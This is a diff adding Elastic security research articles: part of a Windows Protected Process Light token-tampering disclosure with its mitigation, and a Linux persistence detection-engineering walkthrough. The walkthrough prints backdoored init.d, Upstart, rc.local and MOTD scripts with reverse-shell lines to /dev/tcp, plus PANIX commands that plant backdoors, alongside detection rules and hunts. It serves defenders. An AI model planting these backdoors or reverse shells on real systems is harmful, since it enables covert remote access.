+[Process Hacker](https://github.com/processhacker/processhacker/releases/tag/v2.39) provides a nice visualization of token security descriptors. Taking a look at Windows Defender’s (MsMpEng.exe) token, we see the following Discretionary Access Control List (DACL):
+
+![](/assets/images/sandboxing-antimalware-products/advanced-security-settings.jpg)
+
+Note that the SYSTEM user has full control over the token. This means, unless some other mechanism is protecting the token, a thread [running as SYSTEM](https://powersploit.readthedocs.io/en/latest/Privesc/Get-System/) can modify the token. When such modification is possible, it violates the desired “PPL is protected from administrators” design goal.
+
+### Demo
+
+Alas, there is no other mechanism protecting the token. Using this technique, an attacker can forcefully remove all privileges from the MsMpEng.exe token and reduce it from [system to untrusted integrity](https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control). Being nerfed to untrusted integrity prevents the victim process from accessing most securable resources on the system, quietly incapacitating the process without terminating it.
+
+<Video vidyard_uuid="wSgaLpcXyZLupdiwg6BNyj" />
+
+In this video, the attacker could have further restricted the token, but the privilege and integrity changes were sufficient to prevent MsMpEng.exe from detecting and blocking a Mimikatz execution. We felt this illustrated a valid proof of concept.
+
+## Defense
+
+Newer versions of Windows include an undocumented feature called “trust labels.” Trust labels are part of the [System Access Control List](https://docs.microsoft.com/en-us/windows/win32/ad/retrieving-an-objectampaposs-sacl) (SACL), an optional component of every security descriptor. Trust labels allow Windows to restrict specific access rights to certain types of protected processes. For example, Windows [protects](https://www.elastic.co/blog/protecting-windows-protected-processes) the \KnownDlls object directory from [modification by malicious administrators](https://www.elastic.co/blog/detect-block-unknown-knowndlls-windows-acl-hardening-attacks-cache-poisoning-escalation) using a trust label. We can see this with [WinObjEx64](https://github.com/hfiref0x/WinObjEx64):
+
+![](/assets/images/sandboxing-antimalware-products/KnownDlls-Trust-Label.jpg)
+
+Like \KnownDlls, tokens are securable objects, and thus it is possible to protect them against modification by malicious administrators. Elastic Security does this, in fact, and is immune to this attack, by denying TOKEN_WRITE access to processes with a trust label below “Anti-Malware Light.” Because this protection is applied at runtime, however, there is still a brief window of vulnerability until it can apply the trust label.
+
+Ideally, Windows would apply such a trust label to each PPL process’s token as it is created. This would eliminate the race condition and fix the vulnerability in the PPL mechanism. There is precedent. With a kernel debugger, we can see that Windows is already protecting the System process’ token on Windows (21H1 shown below) with a trust label:
+
+```
+1: kd> dx -r1 (((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER))  & ~0xf))->SecurityDescriptor & ~0xf)
+(((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER))  & ~0xf))->SecurityDescriptor & ~0xf) : 0xffffe00649c46c20
+1: kd> !sd 0xffffe00649c46c20
+->Revision: 0x1
+->Sbz1    : 0x0
+->Control : 0x8814
+            SE_DACL_PRESENT
+            SE_SACL_PRESENT
+            SE_SACL_AUTO_INHERITED
+            SE_SELF_RELATIVE
+->Owner   : S-1-5-32-544
+->Group   : S-1-5-32-544
+->Dacl    :
+->Dacl    : ->AclRevision: 0x2
+->Dacl    : ->Sbz1       : 0x0
+->Dacl    : ->AclSize    : 0x1c
+->Dacl    : ->AceCount   : 0x1
+->Dacl    : ->Sbz2       : 0x0
+->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
+->Dacl    : ->Ace[0]: ->AceFlags: 0x0
+->Dacl    : ->Ace[0]: ->AceSize: 0x14
+->Dacl    : ->Ace[0]: ->Mask : 0x000f01ff
+->Dacl    : ->Ace[0]: ->SID: S-1-5-18
+
+->Sacl    :
+->Sacl    : ->AclRevision: 0x2
+->Sacl    : ->Sbz1       : 0x0
+->Sacl    : ->AclSize    : 0x34
+->Sacl    : ->AceCount   : 0x2
+->Sacl    : ->Sbz2       : 0x0
+->Sacl    : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE
+->Sacl    : ->Ace[0]: ->AceFlags: 0x0
+->Sacl    : ->Ace[0]: ->AceSize: 0x14
+->Sacl    : ->Ace[0]: ->Mask : 0x00000001
+->Sacl    : ->Ace[0]: ->SID: S-1-16-16384
+
+->Sacl    : ->Ace[1]: ->AceType: SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE
+->Sacl    : ->Ace[1]: ->AceFlags: 0x0
+->Sacl    : ->Ace[1]: ->AceSize: 0x18
+->Sacl    : ->Ace[1]: ->Mask : 0x00020018
+->Sacl    : ->Ace[1]: ->SID: S-1-19-1024-8192
+
+```
+
+The SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE access control entry limits access to READ_CONTROL, TOKEN_QUERY, and TOKEN_QUERY_SOURCE (0x00020018) unless the caller is a WinTcb protected process (SID S-1-19-1024-8192). That SID can be interpreted as follows:
+
+- 1: [Revision 1](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L1794)
+- 19: [SECURITY_PROCESS_TRUST_AUTHORITY](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2097)
+- 1024:
+  [SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2100)
+- 8192:
+  [SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2104)
+
+### Mitigation
+
+Alongside this article, we are releasing an update to the [PPLGuard](https://github.com/elastic/PPLGuard) proof-of-concept that protects all running anti-malware PPL processes against this attack. It includes example code that anti-malware products can employ to protect themselves. Here it is in action, protecting Defender:
+
+<Video vidyard_uuid="zuKPeTwxbRaGAPL8BsrMKA" />
+
+## Disclosure
+
+We disclosed this vulnerability and proposed fixes to the [Microsoft Security Response Center](https://www.microsoft.com/en-us/msrc?rtc=1) (MSRC) on 2022-01-05. They responded on 2022-01-24 that they have classified it as moderate severity, and will not address it with a security update. However, they may address it in a future version of Windows.
+
+## Conclusion
+
+In this article, we disclosed a flaw in the Windows Protected Process Light (PPL) mechanism. We then demonstrated how malware can use this flaw to neutralize PPL anti-malware products. Finally, we showed a simple ACL fix (with sample code) that anti-malware products can employ to defend against this attack. Elastic Security already incorporates this fix, but we hope that Windows implements it (or something equivalent) by default in the near future.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sequel_on_persistence_mechanisms.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sequel_on_persistence_mechanisms.md
new file mode 100644
index 0000000000000..f57db5fe16bb2
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sequel_on_persistence_mechanisms.md
@@ -0,0 +1,707 @@
+---
+title: "Linux Detection Engineering - A Sequel on Persistence Mechanisms"
+slug: "sequel-on-persistence-mechanisms"
+date: "2024-08-30"
+subtitle: "A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques."
+description: "In this final part of this Linux persistence series, we'll continue exploring persistence mechanisms on Linux systems, focusing on more advanced techniques and how to detect them."
+author:
+  - slug: ruben-groenewoud
+image: "sequel-on-persistence-mechanisms.jpg"
+category:
+  - slug: detection-science
+tags:
+  - linux
+  - persistence
+---
+
+## Introduction
+
+In this third part of the [Linux Detection Engineering series](https://search.elastic.co/?q=Linux%20Detection%20Engineering&location%5B0%5D=Security%20Labs&author%5B0%5D=Ruben%20Groenewoud), we’ll dive deeper into the world of Linux persistence. We start with common or straightforward methods and move towards more complex or obscure techniques. The goal remains the same: to educate defenders and security researchers on the foundational aspects of Linux persistence by examining both trivial and more complicated methods, understanding how these methods work, how to hunt for them, and how to develop effective detection strategies.
+
+In the previous article - "Linux Detection Engineering - a primer on persistence mechanisms" - we explored the foundational aspects of Linux persistence techniques. If you missed it, you can find it [here](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).
+
+We'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid in this process, we’re sharing [PANIX](https://github.com/Aegrah/PANIX), a Linux persistence tool that Ruben Groenewoud of Elastic Security developed. PANIX simplifies and customizes persistence setup to test potential detection opportunities.
+
+By the end of this series, you'll have gained a comprehensive understanding of each of the persistence mechanisms that we covered, including:
+
+* How it works (theory)
+* How to set it up (practice)
+* How to detect it (SIEM and Endpoint rules)
+* How to hunt for it (ES|QL and OSQuery reference hunts)
+
+Let’s go beyond the basics and dig a little bit deeper into the world of Linux persistence, it’s fun!
+
+## Setup note
+
+To ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to [enable and update our pre-built detection rules](https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules). If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and potentially fill in any gaps. Now, we are ready to get started. 
+
+## T1037 - boot or logon initialization scripts: Init
+
+Init, short for "initialization," is the first process started by the kernel during the boot process on Unix-like operating systems. It continues running until the system is shut down. The primary role of an init system is to start, stop, and manage system processes and services.
+
+There are three major init implementations - [Systemd](https://man7.org/linux/man-pages/man1/systemd.1.html), [System V](https://linux.die.net/man/8/service), and [Upstart](https://linux.die.net/man/7/upstart). In [part 1](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms) of this series, we focused on Systemd. In this part, we will explore System V and Upstart. MITRE does not have specific categories for System V or Upstart. These are generally part of [T1037](https://attack.mitre.org/techniques/T1037/).
+
+### T1037 - boot or logon initialization scripts: System V init
+
+[System V (SysV) init](https://linux.die.net/man/8/service) is one of the oldest and most traditional init systems. SysV init scripts are gradually being replaced by modern init systems like Systemd. However, `systemd-sysv-generator` allows Systemd to handle traditional SysV init scripts, ensuring older services and applications can still be managed within the newer framework.
+
+The `/etc/init.d/` directory is a key component of the SysV init system. It is responsible for controlling the startup, running, and shutdown of services on a system. Scripts in this directory are executed at different run levels to manage various system services. Despite the rise of Systemd as the default init system in many modern Linux distributions, `init.d` scripts are still widely used and supported, making them a viable option for persistence.
+
+The scripts in `init.d` are used to start, stop, and manage services. These scripts are executed with root privileges, providing a powerful means for both administrators and attackers to ensure certain commands or services run on boot. These scripts are often linked to [runlevel](https://linux.die.net/man/7/runlevel) directories like `/etc/rc0.d/`, `/etc/rc1.d/`, etc., which determine when the scripts are run. Runlevels, ranging from 0 to 6, define specific operational states, each configuring different services and processes to manage system behavior and user interactions. Runlevels vary depending on the distribution, but generally look like the following:
+
+* 0: Shutdown
+* 1: Single User Mode
+* 2: Multiuser mode without networking
+* 3: Multiuser mode with networking
+* 4: Unused
+* 5: Multiuser mode with networking and GUI
+* 6: Reboot
+
+During system startup, scripts are executed based on the current runlevel configuration. Each script must follow a specific structure, including `start`, `stop`, `restart`, and `status` commands to manage the associated service. Scripts prefixed with `S` (start) or `K` (kill) dictate actions during startup or shutdown, respectively, ordered by their numerical sequence.
+
+An [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L1864-L1881) of a malicious `init.d` script might look similar to the following:
+
+```
+#! /bin/sh
+### BEGIN INIT INFO
+# Provides:             malicious-sysv-script
+# Required-Start:       $remote_fs $syslog
+# Required-Stop:        $remote_fs $syslog
+# Default-Start:        2 3 4 5
+# Default-Stop:         0 1 6
+### END INIT INFO
+
+case "$1" in
+  start)
+    echo "Starting malicious-sysv-script"
+    nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'
+    ;;
+esac
+```
+
+The script must be placed in the `/etc/init.d/` directory and be granted execution permissions. Similarly to Systemd services, SysV scripts must also be enabled. A common utility to manage SysV configurations is `update-rc.d`. It allows administrators to enable or disable services and manage the symbolic links (start and kill scripts) in the `/etc/rc*.d/` directories, automatically setting the correct runlevels based on the configuration of the script.
+
+```
+sudo update-rc.d malicious-sysv-script defaults
+```
+
+The `malicious-sysv-script` is now enabled and ready to run on boot. MITRE specifies more information and real-world examples related to this technique in [T1037](https://attack.mitre.org/techniques/T1037/).
+
+#### Persistence through T1037 - System V init
+
+You can manually set up a test script within the `/etc/init.d/` directory, grant it execution permissions, enable it, and reboot it, or simply use [PANIX](https://github.com/aegrah/PANIX). PANIX is a Linux persistence tool that simplifies and customizes persistence setup for testing your detections. We can use it to establish persistence simply by running:
+
+```
+> sudo ./panix.sh --initd --default --ip 192.168.1.1 --port 2006
+> [+] init.d backdoor established with IP 192.168.1.1 and port 2006.
+```
+
+Prior to rebooting and actually establishing persistence, we can see the following documents being generated in Discover:
+
+![Events generated as a result of System V init persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image14.png "Events generated as a result of System V init persistence establishment")
+
+After executing PANIX, it generates a SysV init script named `/etc/init.d/ssh-procps`, applies executable permissions using `chmod +x`, and utilizes `update-rc.d`. This command triggers `systemctl daemon-reload`, which, in turn, activates the `systemd-sysv-generator` to enable `ssh-procps` during system boot.
+
+Let’s reboot the system and look at the events that are generated on shutdown/boot.
+
+![Events generated as a result of System V init persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image8.png "Events generated as a result of System V init persistence establishment")
+
+As the SysV init system is loaded early, the start command is not logged. Since it is impossible to detect an event before events are being ingested, we need to be creative in detecting this technique. Elastic will capture `already_running` event actions for service initialization events. Through this chain we are capable of detecting the execution of the service, followed by the reverse shell that was initiated. We have several detection opportunities for this persistence technique.
+
+| Category | Coverage                                                     |
+|----------|--------------------------------------------------------------|
+| File     | [System V Init Script Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_init_d_file_creation.toml)                                 |
+|          | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml)             |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)                  |
+| Process  | [System V Init (init.d) Executed Binary from Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_system_v_init_(init.d)_executed_binary_from_unusual_location.toml) |
+|          | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml)          |
+| Network  | [System V Init (init.d) Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_system_v_init_(init.d)_egress_network_connection.toml)             |
+
+
+
+#### Hunting for T1037 - System V init
+
+Other than relying on detections, it is important to incorporate threat hunting into your workflow, especially for persistence mechanisms like these, where events can potentially be missed due to timing. This blog will solely list the available hunts for each persistence mechanism; however, more details regarding this topic are outlined at the end of the first section in [the previous article on persistence](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms). Additionally, descriptions and references can be found in our [Detection Rules repository](https://github.com/elastic/detection-rules), specifically in the [Linux hunting subdirectory](https://github.com/elastic/detection-rules/tree/main/hunting).
+
+We can hunt for System V Init persistence through [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) and [OSQuery](https://www.elastic.co/guide/en/kibana/current/osquery.html), focusing on unusual process executions and file creations. The [Persistence via System V Init](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_sysv_init.toml) rule contains several ES|QL and OSQuery queries that can help hunt for these types of persistence.
+
+### T1037 - boot or logon initialization scripts: Upstart
+
+[Upstart](https://linux.die.net/man/7/upstart) was introduced as an alternative init system designed to improve boot performance and manage system services more dynamically than traditional SysV init. While it has been largely supplanted by systemd in many Linux distributions, Upstart is still used in some older releases and legacy systems.
+
+The core of Upstart's configuration resides in the `/etc/init/` directory, where job configuration files define how services are started, stopped, and managed. Each job file specifies dependencies, start conditions, and actions to be taken upon start, stop, and other events.
+
+In Upstart, run levels are replaced with events and tasks, which define the sequence and conditions under which jobs are executed. Upstart introduces a more event-driven model, allowing services to start based on various system events rather than predefined run levels.
+
+Upstart can run system-wide or in user-session mode. While system-wide configurations are placed in the `/etc/init/` directory, user-session mode configurations are located in:
+
+* `~/.config/upstart/`
+* `~/.init/`
+* `/etc/xdg/upstart/`
+* `/usr/share/upstart/sessions/`
+
+An example of an Upstart job file can look like this:
+
+```
+description "Malicious Upstart Job"
+author "Ruben Groenewoud"
+
+start on runlevel [2345]
+stop on shutdown
+
+exec nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'
+```
+
+The `malicious-upstart-job.conf` file defines a job that starts on run levels 2, 3, 4, and 5 (general Linux access and networking), and stops on run levels 0, 1, and 6 (shutdown/reboot). The `exec` line executes the malicious payload to establish a reverse shell connection when the system boots up.
+
+To enable the Upstart job and ensure it runs on boot, the job file must be placed in `/etc/init/` and given appropriate permissions. Upstart jobs are automatically recognized and managed by the `Upstart init daemon`.
+
+Upstart was deprecated a long time ago, with Linux distributions such as Debian 7 and Ubuntu 16.04 being the final systems that leverage Upstart by default. These systems moved to the SysV init system, removing compatibility with Upstart altogether. Based on the data in our [support matrix](https://www.elastic.co/support/matrix), only the Elastic Agent in Beta version supports some of these old operating systems, and the recent version of Elastic Defend does not run on them at all. These systems have been EOL for years and should not be used in production environments anymore.
+
+Because of this reason, we added support/coverage for this technique to the [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) detection rule. If you are still running these systems in production, using, for example, old versions of [Auditbeat](https://www.elastic.co/beats/auditbeat) to gather its logs, you can set up [Auditbeat file creation](https://www.elastic.co/guide/en/beats/auditbeat/current/configuration-auditbeat.html) and [FIM](https://www.elastic.co/docs/current/integrations/fim) file modification rules in the `/etc/init/` directory, similar to the techniques mentioned in the [previous blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms), and in the sections yet to come. Similarly to System V Init, information and real-world examples related to this technique are specified by MITRE in [T1037](https://attack.mitre.org/techniques/T1037/).
+
+## T1037.004 - boot or logon initialization scripts: run control (RC) scripts
+
+The [rc.local](https://man.freebsd.org/cgi/man.cgi?rc.local) script is a traditional method for executing commands or scripts on Unix-like operating systems during system boot. It is located at `/etc/rc.local` and is typically used to start services, configure networking, or perform other system initialization tasks that do not warrant a full init script. In Darwin-based systems and very few other Unix-like systems, `/etc/rc.common` is used for the same purpose. 
+
+Newer versions of Linux distributions have phased out the `/etc/rc.local` file in favor of Systemd for handling initialization scripts. Systemd provides compatibility through the [systemd-rc-local-generator](https://man7.org/linux/man-pages/man8/systemd-rc-local-generator.8.html) generator; this executable ensures backward compatibility by checking if `/etc/rc.local` exists and is executable. If it meets these criteria, it integrates the `rc-local.service` unit into the boot process. Therefore, as long as this generator is included in the Systemd setup, `/etc/rc.local` scripts will execute during system boot. In RHEL derivatives, `/etc/rc.d/rc.local` must be granted execution permissions for this technique to work. 
+
+The `rc.local` script is a shell script that contains commands or scripts to be executed once at the end of the system boot process, after all other system services have been started. This makes it useful for tasks that require specific system conditions to be met before execution. Here’s an example of how a simple backdoored `rc.local` script might look:
+
+```
+#!/bin/sh
+/bin/bash -c 'sh -i >& /dev/tcp/$ip/$port 0>&1'
+exit 0
+```
+
+The command above creates a reverse shell by opening a bash session that redirects input and output to a specified IP address and port, allowing remote access to the system.
+
+To ensure `rc.local` runs during boot, the script must be marked executable. On the next boot, the `systemd-rc-local-generator` will create the necessary symlink in order to enable the `rc-local.service` and execute the `rc.local` script. RC scripts did receive their own sub-technique by MITRE. More information and examples of real-world usage of RC Scripts for persistence can be found in [T1037.004](https://attack.mitre.org/techniques/T1037/004/).
+
+### Persistence through T1037.004 - run control (RC) scripts
+
+As long as the `systemd-rc-local-generator` is present, establishing persistence through this technique is simple. Create the `/etc/rc.local` file, add your payload, and mark it as executable. We will leverage the following PANIX command to establish it for us.
+
+```
+> sudo ./panix.sh --rc-local --default --ip 192.168.1.1 --port 2007
+> [+] rc.local backdoor established 
+```
+
+After rebooting the system, we can see the following events being generated:
+
+![Events generated as a result of RC Script persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image6.png "Events generated as a result of RC Script persistence establishment")
+
+The same issue as before arises. We see the execution of PANIX, creating the `/etc/rc.local` file and granting it execution permissions. When running `systemctl daemon-reload`, we can see the `systemd-rc-local-generator` creating a symlink in the `/run/systemd/generator[.early|late]` directories. 
+
+Similar to the previous example in which we ran into this issue, we can again use the `already_running` `event.action` documents to get some information on the executions. Digging into this, one method that detects potential traces of `rc.local` execution is to search for documents containing `/etc/rc.local start` entries:
+
+![Events generated as a result of rc.local service status](/assets/images/sequel-on-persistence-mechanisms/image7.png "Events generated as a result of rc.local service status")
+
+Where we see `/etc/rc.local` being started, after which a suspicious command is executed. The `/opt/bds_elf` is a rootkit, leveraging `rc.local` as a persistence method. 
+
+Additionally, we can leverage the [syslog](https://man7.org/linux/man-pages/man3/syslog.3.html) data source, as this file is parsed on initialization of the system integration. You can set up [Filebeat](https://www.elastic.co/beats/filebeat) or the [Elastic Agent](https://www.elastic.co/elastic-agent) with the [System integration](https://www.elastic.co/docs/current/en/integrations/system) to harvest syslog. When looking at potential errors in its execution logs, we can detect other traces of `rc.local` execution events for both our testing and rootkit executions:
+
+![Events generated as a result of /etc/rc.local syslog error messages](/assets/images/sequel-on-persistence-mechanisms/image4.png "Events generated as a result of /etc/rc.local syslog error messages")
+
+Because of the challenges in detecting these persistence mechanisms, it is very important to catch traces as early in the chain as possible. Leveraging a multi-layered defense strategy increases the chances of detecting techniques like these.
+
+| Category | Coverage                                            |
+|----------|-----------------------------------------------------|
+| File     | [rc.local/rc.common File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_script_creation.toml)                    |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)         |
+| Process  | [Potential Execution of rc.local Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_local_service_already_running.toml)              |
+|          | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |
+| Syslog   | [Suspicious rc.local Error Message](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_local_error_via_syslog.toml)                   |
+
+### Hunting for T1037.004 - run control (RC) scripts
+
+Similar to the System V Init detection opportunity limitations, this technique deals with the same limitations due to timing. Thus, hunting for RC Script persistence is important. We can hunt for this technique by looking at `/etc/rc.local` file creations and/or modifications and the existence of the `rc-local.service` systemd unit/startup item. The [Persistence via rc.local/rc.common](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_rc_local.toml) rule contains several ES|QL and OSQuery queries that aid in hunting for this technique. 
+
+## T1037 - boot or logon initialization scripts: Message of the Day (MOTD)
+
+[Message of the Day (MOTD)](https://linux.die.net/man/5/motd) is a feature that displays a message to users when they log in via SSH or a local terminal. To display messages before and after the login process, Linux uses the `/etc/issue` and the `/etc/motd` files. These messages display on the command line and will not be seen before and after a graphical login. The `/etc/issue` file is typically used to display a login message or banner, while the `/etc/motd` file generally displays issues, security policies, or messages. These messages are global and will display to all users at the command line prompt. Only a privileged user (such as root) can edit these files.
+
+In addition to the static `/etc/motd` file, modern systems often use dynamic MOTD scripts stored in `/etc/update-motd.d/`. These scripts generate dynamic content that can be included in the MOTD, such as current system metrics, weather updates, or news headlines.
+
+These dynamic scripts are shell scripts that execute shell commands. It is possible to create a new file within this directory or to add a backdoor to an existing one. Once the script has been granted execution permissions, it will execute every time a user logs in.
+
+RHEL derivatives do not make use of dynamic MOTD scripts in a similar way as Debian does, and are not susceptible to this technique. 
+
+An example of a backdoored `/etc/update-motd.d/` file could look like this:
+
+```
+#!/bin/sh
+nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'
+```
+
+Like before, MITRE does not have a specific technique related to this. Therefore we classify this technique as [T1037](https://attack.mitre.org/techniques/T1037/).
+
+### Persistence through T1037 - message of the day (MOTD)
+
+A [payload](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L1644-L1669) similar to the one presented above should be used to ensure the backdoor does not interrupt the SSH login, potentially triggering the user’s attention. We can leverage PANIX to set up persistence on Debian-based systems through MOTD like so:
+
+```
+ > sudo ./panix.sh --motd --default --ip 192.168.1.1 --port 2008
+> [+] MOTD backdoor established in /etc/update-motd.d/137-python-upgrades
+```
+
+To trigger the backdoor, we can reconnect to the server via SSH or reconnect to the terminal.
+
+![Events generated as a result of Message of the Day (MOTD) persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image2.png "Events generated as a result of Message of the Day (MOTD) persistence establishment")
+
+In the image above we can see PANIX being executed, which creates the `/etc/update-motd.d/137-python-upgrades` file and marks it as executable. Next, when a user connects to SSH/console, the payload is executed, resulting in an egress network connection by the root user. This is a straightforward attack chain, and we have several layers of detections for this:
+
+| Category | Coverage                                             |
+|----------|------------------------------------------------------|
+| File     | [Message-of-the-Day (MOTD) File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_message_of_the_day_creation.tom)              |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)          |
+| Process  | [Process Spawned from Message-of-the-Day (MOTD)](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_process_spawned_from_motd_detected.toml)       |
+|          | [Suspicious Message Of The Day Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_message_of_the_day_execution.toml)              |
+|          | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml)  |
+| Network  | [MOTD Execution Followed by Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_motd_execution_followed_by_egress_network_connection.toml) |
+|          | [Egress Network Connection by MOTD Child](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_network_connection_by_motd_child.toml)              |
+
+### Hunting for T1037 - message of the day (MOTD)
+
+Hunting for MOTD persistence can be conducted through ES|QL and OSQuery. We can do so by analyzing file creations in these directories and executions from MOTD parent processes. We created the [Persistence via Message-of-the-Day](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_message_of_the_day.toml) rule aid in this endeavor.
+
+## T1546 - event triggered execution: udev
+
+[Udev](https://man7.org/linux/man-pages/man7/udev.7.html) is the device manager for the Linux kernel, responsible for managing device nodes in the `/dev` directory. It dynamically creates or removes device nodes, manages permissions, and handles various events triggered by device state changes. Essentially, Udev acts as an intermediary between the kernel and user space, ensuring that the operating system appropriately handles hardware changes.
+
+When a new device is added to the system (such as a USB drive, keyboard, or network interface), Udev detects this event and applies predefined rules to manage the device. Each rule consists of key-value pairs that match device attributes and actions to be performed. Udev rules files are processed in lexical order, and rules can match various device attributes, including device type, kernel name, and more. Udev rules are defined in text files within a default set of directories:
+
+* `/etc/udev/rules.d/`
+* `/run/udev/rules.d/`
+* `/usr/lib/udev/rules.d/`
+* `/usr/local/lib/udev/rules.d/`
+* `/lib/udev/`
+
+Priority is measured based on the source directory of the rule file and takes precedence based on the order listed above (`/etc/` → `/run/` → `/usr/`). When a rule matches, it can trigger a wide range of actions, including executing arbitrary commands or scripts. This flexibility makes Udev a potential vector for persistence by malicious actors. An example Udev rule looks like the following:
+
+```
+SUBSYSTEM=="block", ACTION=="add|change", ENV{DM_NAME}=="ubuntu--vg-ubuntu--lv", SYMLINK+="disk/by-dname/ubuntu--vg-ubuntu--lv"
+```
+
+To leverage this method for persistence, root privileges are required. Once a rule file is created, the rules need to be reloaded.
+
+```
+sudo udevadm control --reload-rules
+```
+
+To test the rule, either perform the action specified in the rule file or use the [udevadm](https://www.man7.org/linux/man-pages/man8/udevadm.8.html) trigger utility.
+
+```
+sudo udevadm trigger -v
+```
+
+Additionally, these drivers can be monitored using `udevadm`, by running:
+
+```
+udevadm monitor --environment
+```
+
+Eder’s [blog](https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/) titled “Leveraging Linux udev for persistence” is a very good read for more information on this topic. This technique has several limitations, making it more difficult to leverage the persistence mechanism.
+
+* Udev rules are limited to short foreground tasks due to potential blocking of subsequent events.
+* They cannot execute programs accessing networks or filesystems, enforced by `systemd-udevd.service`'s sandbox.
+* Long-running processes are terminated after event handling.
+
+Despite these restrictions, bypasses include creating detached processes outside udev rules for executing implants, such as:
+
+* Leveraging `at`/`cron`/`systemd` for independent scheduling.
+* Injecting code into existing processes.
+
+Although persistence would be set up through a different technique than udev, udev would still grant a persistence mechanism for the `at`/`cron`/`systemd` persistence mechanism. MITRE does not have a technique dedicated to this mechanism — the most logical technique to add this to would be [T1546](https://attack.mitre.org/techniques/T1546/).
+
+Researchers from AON recently discovered a malware called "sedexp" that achieves persistence using Udev rules - a technique rarely seen in the wild - so be sure to check out [their research article](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp).
+
+## Persistence through T1546 - udev
+
+PANIX allows you to test all three techniques by leveraging `--at`, `--cron` and `--systemd`, respectively. Or go ahead and test it manually. We can set up udev persistence through `at`, by running the following command:
+
+```
+> sudo ./panix.sh --udev --default --ip 192.168.1.1 --port 2009 --at
+```
+
+To trigger the payload, you can either run `sudo udevadm trigger` or reboot the system. Let’s analyze the events in Discover.
+
+![Events generated as a result of Udev At persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image16.png "Events generated as a result of Udev At persistence establishment")
+
+In the figure above, PANIX is executed, which creates the `/usr/bin/atest` backdoor and grants it execution permissions. Subsequently, the `10-atest.rules` file is generated, and the drivers are reloaded and triggered. This causes `At` to be spawned as a child process of `udevadm`, creating the `atspool`/`atjob`, and subsequently executing the reverse shell.
+
